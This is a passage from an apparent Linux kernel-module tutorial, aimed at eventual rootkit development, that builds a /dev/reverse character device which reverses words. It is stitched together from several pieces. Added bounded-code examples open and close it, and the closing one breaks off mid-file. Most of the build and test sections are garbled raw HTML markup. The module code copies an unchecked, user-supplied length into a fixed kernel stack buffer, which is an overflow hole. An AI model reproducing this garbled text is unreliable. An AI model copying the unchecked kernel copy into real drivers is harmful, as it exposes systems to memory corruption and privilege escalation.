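The bounds checks described above, as an added example that is not part of the original post: the same word-reversing logic, but with the input length passed in explicitly and a hard limit of `DEVICE_SIZE` bytes on both the input and the output store, so neither `word` nor `data` can be written past its end and a too-long input is rejected instead of overflowing. The names `reverse_safe`, `insert_word_safe`, `current_data` and `oversize_rejected` are this example's own; the explicit length parameter stands in for the byte count a driver's write handler is handed and should validate before copying anything.

```c
/* Added example (not the post's own code): a bounded version of the
 * reverse-test-app word reverser, compilable and testable in userland. */
#include <stdio.h>
#include <string.h>

#define DEVICE_SIZE 512

/* Output store, same layout as the post's global: DEVICE_SIZE bytes plus NUL. */
static char data[DEVICE_SIZE + 1] = "no data has been written yet";

/* Append one word (reversed back into reading order) to the store.
 * Every index written is checked against DEVICE_SIZE first.
 * Returns 0 on success, -1 if the store would overflow. */
static int insert_word_safe(const char *word, size_t wordlen, unsigned int n)
{
    size_t used = (n == 0) ? 0 : strlen(data);
    size_t need = used + wordlen + (n == 0 ? 0 : 1);  /* +1 for the separating space */
    size_t i;

    if (wordlen > DEVICE_SIZE || need > DEVICE_SIZE)  /* belt and braces: see reverse_safe() */
        return -1;

    if (n == 0)
        memset(data, 0, sizeof data);
    else
        data[used++] = ' ';

    for (i = 0; i < wordlen; i++)
        data[used + i] = word[wordlen - 1 - i];
    data[used + wordlen] = '\0';
    return 0;
}

/* Reverse the order of the words in `in`. The caller supplies the length
 * explicitly (as a write handler receives its byte count), so the function
 * never relies on a NUL terminator that untrusted input may not carry.
 * Returns 0 on success, -1 if the input is longer than the store. */
int reverse_safe(const char *in, size_t len)
{
    char word[DEVICE_SIZE + 1];
    size_t c = 0;
    unsigned int n = 0;
    size_t i;

    if (len > DEVICE_SIZE)  /* the check the post's code lacks */
        return -1;

    for (i = len; i-- > 0;) {
        if (in[i] == ' ') {
            if (insert_word_safe(word, c, n) != 0)
                return -1;
            n++;
            c = 0;
        } else {
            word[c++] = in[i];  /* c < len <= DEVICE_SIZE, so always in bounds */
        }
    }
    return insert_word_safe(word, c, n);
}

/* Read-only view of the store, for callers and tests. */
const char *current_data(void) { return data; }

/* Exercise the length check with a constructed input one byte too long.
 * Returns 1 if the input was rejected and the store left untouched. */
int oversize_rejected(void)
{
    char big[DEVICE_SIZE + 2];
    memset(big, 'A', DEVICE_SIZE + 1);
    big[DEVICE_SIZE + 1] = '\0';
    return reverse_safe(big, DEVICE_SIZE + 1) == -1;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        printf("Usage: %s <string>\n", argv[0]);
        return 1;
    }
    printf("Before: %s\n", data);
    if (reverse_safe(argv[1], strlen(argv[1])) != 0) {
        printf("Rejected: input longer than %d bytes\n", DEVICE_SIZE);
        return 1;
    }
    printf("After: %s\n", data);
    return 0;
}
```

Run it with the same strings as the test above and it produces the same "After:" lines; hand it 513 bytes and it refuses rather than writing past `word` or `data`. The length check in `reverse_safe` is the one that matters; the check inside `insert_word_safe` can never trigger once the input is bounded (the output is never longer than the input) and is there only so the helper stays safe if it is reused elsewhere.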
I guess it's worth mentioning here that the "datastore" in our LKM will be exactly the same as here, just a global character array; we could use any memory really, but I'm using a character array for simplicity.

The functions (`reverse` and `insert_word`) in the test application can be put into the LKM as is.

Almost done, but a userland application can only write to and read from memory in userland, and LKMs should only write to and read from kernelland directly, so we need a way to copy to and from userland while in kernelland. Luckily the kernel provides us with functions to do that.

In the `include/asm-generic/uaccess.h` header file (which we'll also need to include) `copy_from_user` and `copy_to_user` are defined as follows:

```c
static inline long copy_from_user(void *to,
        const void __user * from, unsigned long n)
{
    might_fault();
    if (access_ok(VERIFY_READ, from, n))
        return __copy_from_user(to, from, n);
    else
        return n;
}

static inline long copy_to_user(void __user *to,
        const void *from, unsigned long n)
{
    might_fault();
    if (access_ok(VERIFY_WRITE, to, n))
        return __copy_to_user(to, from, n);
    else
        return n;
}
```

Both of these functions take two void pointers (one pointing to memory in userland and one pointing to memory in kernelland; they are `void *` so that any type of data can be transferred) and a number (the amount of bytes to be copied). As the source above shows, they return the number of bytes that could not be copied, so a return value of 0 means success.

With all of this information we can finally build our character device:
```c
#include <linux/module.h>
#include <linux/init.h>
#include <linux/miscdevice.h>
#include <linux/fs.h>
#include <asm/uaccess.h>

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("A simple character device which reverses the words in a string");
MODULE_LICENSE("GPL");

#define DEVICE_SIZE 512

char data[DEVICE_SIZE+1]="no data has been written yet";

void insert_word(char *word, unsigned int n)
{
    int i, c;
    char tmpword[DEVICE_SIZE+1];
    for (i = strlen(word)-1, c = 0; i >= 0; i--, c++) {
        tmpword[c] = word[i];
    }
    tmpword[strlen(word)] = '\0';
    if (n == 0) {
        memset(data, 0, sizeof data);
        strcpy(data, tmpword);
    } else {
        data[strlen(data)] = ' ';
        data[strlen(data)+1] = '\0';
        strcat(data, tmpword);
    }
}

void reverse(char *tmpdata)
{
    int i, c;
    unsigned int n = 0;
    char word[DEVICE_SIZE+1];
    for (i = strlen(tmpdata)-1, c = 0; i >= 0; i--, c++) {
        if (tmpdata[i] == ' ') {
            word[c] = '\0';
            insert_word(word, n);
            n += 1;
            c = -1;
        } else
            word[c] = tmpdata[i];

    }
    word[c] = '\0';
    insert_word(word, n);
    data[strlen(tmpdata)] = '\0';
}

ssize_t reverse_read(struct file *filep, char *buff, size_t count, loff_t *offp)
{
    if (copy_to_user(buff, data, strlen(data)) != 0) {
        printk("Kernel -> userspace copy failed!\n");
        return -1;
    }
    return strlen(data);
}

ssize_t reverse_write(struct file *filep, const char *buff, size_t count, loff_t *offp)
{
    char tmpdata[DEVICE_SIZE+1];
    if (copy_from_user(tmpdata, buff, count) != 0) {
        printk("Userspace -> kernel copy failed!\n");
        return -1;
    }
    reverse(tmpdata);
    return 0;
}

struct file_operations reverse_fops = {
    read: reverse_read,
    write: reverse_write
};

static struct miscdevice reverse_misc_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "reverse",
    .fops = &reverse_fops
};

static int __init reverse_init(void)
{
    misc_register(&reverse_misc_device);

    return 0;
}

static void __exit reverse_exit(void)
{
    misc_deregister(&reverse_misc_device);
}

module_init(reverse_init);
module_exit(reverse_exit);
```

## Compiling The Device

As before, we'll need a `Makefile`:

```make
obj-m += hello.o
obj-m += reverse.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
```

All that is left is to type `make`:
class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanmake/span span class="code-line"span class="go"make -C /lib/modules/3.12-kali1-686-pae/build M=/root/lkms modules/span/span span class="code-line"span class="go"make[1]: Entering directory `/usr/src/linux-headers-3.12-kali1-686-pae#39;/span/span span class="code-line"span class="go" CC [M] /root/lkms/reverse.o/span/span span class="code-line"span class="go" Building modules, stage 2./span/span span class="code-line"span class="go" MODPOST 2 modules/span/span span class="code-line"span class="go" LD [M] /root/lkms/reverse.ko/span/span span class="code-line"span class="go"make[1]: Leaving directory `/usr/src/linux-headers-3.12-kali1-686-pae#39;/span/span span class="code-line"/code/pre/div /td/tr/table h2Testing The Device/h2 pBefore we can test the device, we need an application that can read from and write to the device file, here is my application to do that:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span 
class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span 
class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;paths.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/stat.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;fcntl.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define CDEV_DEVICE quot;reversequot;/span/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"buf/spanspan class="p"[/spanspan class="mi"512/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"argv/spanspan class="p"[])/spanspan class="w"/span/span 
span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: %s lt;stringgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"len/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"])/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="mi"1/spanspan class="p")/spanspan class="w" /spanspan class="o"gt;/spanspan class="w" /spanspan class="mi"512/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;ERROR: String too long/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan 
class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"fd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"open/spanspan class="p"(/spanspan class="s"quot;/dev/quot;/spanspan class="w" /spanspan class="n"CDEV_DEVICE/spanspan class="p",/spanspan class="w" /spanspan class="n"O_RDWR/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;/dev/quot;/spanspan class="w" /spanspan class="n"CDEV_DEVICE/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;fd :%d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="n"fd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"read/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan 
class="mi"-1/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;read()quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Before: /spanspan class="se"\quot;/spanspan class="s"%s/spanspan class="se"\quot;/spanspan class="s"./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"write/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"],/spanspan class="w" /spanspan class="n"len/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;write()quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrote: /spanspan class="se"\quot;/spanspan class="s"%s/spanspan class="se"\quot;/spanspan class="s"./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan 
class="n"read/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;read()quot;/spanspan class="p");/spanspan class="w" /span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w" /span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;After: /spanspan class="se"\quot;/spanspan class="s"%s/spanspan class="se"\quot;/spanspan class="s"./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"close/spanspan class="p"(/spanspan class="n"fd/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;close()quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span 
span class="code-line"/code/pre/div /td/tr/table pThis is a very basic application that uses the POSIX codeopen/code, coderead/code, codewrite/code and codeclose/code functions to use the device file. Also, I am implementing the bounds check here (on line 20) so I can't write any more than 512 bytes (the size of our character device datastore) but in a real situation you should implement the bounds checking in the LKM itself./p pNow we can test the LKM properly:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spangcc -o reverse-app reverse-app.c /span span class="code-line"span class="gp"[email protected]:~/lkms# /spaninsmod ./reverse.ko/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanlsmod span class="p"|/span grep reverse/span span class="code-line"span class="go"reverse 12476 0 /span/span span class="code-line"span class="gp"[email 
protected]:~/lkms# /spanls -l /dev/reverse /span span class="code-line"span class="go"crw------- 1 root root 10, 58 Jun 9 23:22 /dev/reverse/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app /span span class="code-line"span class="go"Usage: ./reverse-app lt;stringgt;/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app span class="s2"quot;I am testing my first character devicequot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;no data has been written yetquot;./span/span span class="code-line"span class="go"Wrote: quot;I am testing my first character devicequot;./span/span span class="code-line"span class="go"After: quot;device character first my testing am Iquot;./span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app span class="s2"quot;device character first my testing am Iquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;device character first my testing am Iquot;./span/span span class="code-line"span class="go"Wrote: quot;device character first my testing am Iquot;./span/span span class="code-line"span class="go"After: quot;I am testing my first character devicequot;./span/span span class="code-line"/code/pre/div /td/tr/table pI check to see if the device file has been created on line 5, and looking at the output it has a major number of 10 and a minor number of 58. 
I then test it using the test application and it works perfectly./p pIts worth noting that you can delete the device file, recreate it and the data will remain there, this is because the data isn't stored in the file, but in the global character array in the LKM itself:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanrm /dev/reverse /span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /dev/reverse /span span class="code-line"span class="go"ls: cannot access /dev/reverse: No such file or directory/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanmknod /dev/reverse c span class="m"10/span span class="m"58/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app span class="s2"quot;Another test stringquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;I am testing my first character devicequot;./span/span span class="code-line"span class="go"Wrote: quot;Another test stringquot;./span/span span class="code-line"span 
class="go"After: quot;string test Anotherst character devicequot;./span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app span class="s2"quot;Another testquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;string test Anotherquot;./span/span span class="code-line"span class="go"Wrote: quot;Another testquot;./span/span span class="code-line"span class="go"After: quot;test AnotherAnotherquot;./span/span span class="code-line"/code/pre/div /td/tr/table pSomething funny happened while the application was reading from the device the second time, the data hadn't fully been written yet, this isn't really important to us (as our code is running in kernelland and will get the data straight away) but its worth knowing this if you are going to develop actual drivers and not just rootkits. As you can see though by the time I run the test application again, the data had been fully updated./p pLastly I'd just like to show you that you can create more than 1 device file in different locations, and even with different names, as long as the major and minor numbers are the same:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span 
class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanmknod /root/mynewdevfile c span class="m"10/span span class="m"58/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /dev/reverse/span span class="code-line"span class="go"crw-r--r-- 1 root root 10, 58 Jun 9 23:29 /dev/reverse/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /root/mynewdevfile/span span class="code-line"span class="go"crw-r--r-- 1 root root 10, 58 Jun 9 23:39 /root/mynewdevfile/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spancp reverse-app.c reverse-app2.c/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanvim reverse-app2.c /span span class="code-line"span class="gp"[email protected]:~/lkms# /spangcc -o reverse-app2 reverse-app2.c /span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app2/span span class="code-line"span class="go"Usage: ./reverse-app2 lt;stringgt;/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app2 span class="s2"quot;this is my last testquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;test Anotherquot;./span/span span class="code-line"span class="go"Wrote: quot;this is my last testquot;./span/span span class="code-line"span class="go"After: quot;test last my is thisquot;./span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app span class="s2"quot;test last my is 
thisquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;test last my is thisquot;./span/span span class="code-line"span class="go"Wrote: quot;test last my is thisquot;./span/span span class="code-line"span class="go"After: quot;this is my last testquot;./span/span span class="code-line"/code/pre/div /td/tr/table pHere I've just created a new a href="/assets/code/linux-kernel-hacking/reverse-app2.c"codereverse-app2.c/code/a so that it uses the device file at code/root/mynewdevfile/code. As you can see from the output of the applications that both device files are using the same datastore and they both do exactly the same thing./p pLastly, any extra device files will still exist after the LKM has been unloaded (and will need to be manually removed) but the original file (code/dev/reverse/code) will be automatically deleted:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanrmmod reverse/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanlsmod span class="p"|/span grep reverse/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /dev/reverse/span span class="code-line"span class="go"ls: cannot access /dev/reverse: No such file or directory/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l 
/root/mynewdevfile/span span class="code-line"span class="go"crw-r--r-- 1 root root 10, 58 Jun 9 23:39 /root/mynewdevfile/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanrm /root/mynewdevfile/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /root/mynewdevfile/span span class="code-line"span class="go"ls: cannot access /root/mynewdevfile: No such file or directory/span/span span class="code-line"/code/pre/div /td/tr/table h2Conclusion/h2 pCharacter devices can be very useful for userland/kernelland communication, this can be done with system calls to a degree but its a lot more difficult to implement a system call in an LKM./p pWhen doing any kernel development, the kernel source is a necessity, you can download it from https://www.kernel.org/, see what version of the kernel you have, using codeuname -r/code, and download the correct source. Getting used to the kernel source will make you a much better kernel developer and ultimately a better rootkit developer./p pLastly I'd like to highlight again that any form of kernel development is very dangerous to the system you are developing on, you risk crashing the system and even corrupting data, only do this on a development machine and if stuff breaks don't blame me for any damage done!/p pHappy Hacking :-)/p
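The two points the test runs above raise (the bounds check that belongs in the LKM rather than in reverse-app.c, and the leftover "st character device" / "Another" tails in the "After:" output) can be reproduced in plain userspace without loading a module. The following is an added example and is not the tutorial's reverse.c or reverse-app.c: it models the 512-byte datastore, a write handler that does its own length check and NUL-terminates, a read handler that behaves the way the transcript implies the module's does (ignores count, copies no terminator), a hardened read, and a simulation of one reverse-app run (read, write, read with count = strlen + 1). All function names, the reverse_words() implementation and the simulated app are this example's own; the "as observed" handler semantics are inferred from the transcript, not taken from the module's code.

```c
/*
 * Added example (not the tutorial's code): userspace model of the reverse
 * device's datastore and handlers, used to reproduce the stale-tail output
 * from the test runs and to show the checks a real driver needs.
 */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define DATA_SIZE 512

/* Stands in for the module's global character array. */
static char datastore[DATA_SIZE + 1] = "no data has been written yet";

void model_reset(const char *initial)
{
    memset(datastore, 0, sizeof datastore);
    strncpy(datastore, initial, DATA_SIZE);
}

const char *model_data(void) { return datastore; }

/* Reverse the order of space-separated words of src (len bytes) into dst.
   Writes exactly len bytes and no terminator; dst and src must not overlap. */
void reverse_words(char *dst, const char *src, size_t len)
{
    size_t out = 0, end = len;
    while (end > 0) {
        size_t start = end;
        while (start > 0 && src[start - 1] != ' ')
            start--;
        memcpy(dst + out, src + start, end - start);
        out += end - start;
        if (start == 0)
            break;
        dst[out++] = ' ';            /* src[start - 1] was the separating space */
        end = start - 1;
    }
}

/* .write model with the length check inside the "module" instead of the test
   app: rejects what cannot fit, stores the reversed words, always terminates,
   and returns count like a real write handler. -EINVAL mirrors kernel style. */
long model_write(const char *buf, size_t count)
{
    char tmp[DATA_SIZE + 1];
    size_t len = 0;
    if (count == 0 || count > DATA_SIZE)
        return -EINVAL;
    memcpy(tmp, buf, count);         /* copy_from_user() in the module */
    while (len < count && tmp[len] != '\0')
        len++;                       /* reverse-app sends strlen + 1 bytes */
    reverse_words(datastore, tmp, len);
    datastore[len] = '\0';
    return (long)count;
}

/* .read as the transcript implies it behaves: a 20-byte request returned the
   whole 38-byte string and no terminator. dst must hold DATA_SIZE + 1 bytes,
   as reverse-app's static buf does; a smaller buffer would be overrun. */
long read_as_observed(char *dst, size_t count)
{
    size_t len = strlen(datastore);
    (void)count;                     /* requested size ignored */
    memcpy(dst, datastore, len);     /* terminator not copied */
    return (long)len;
}

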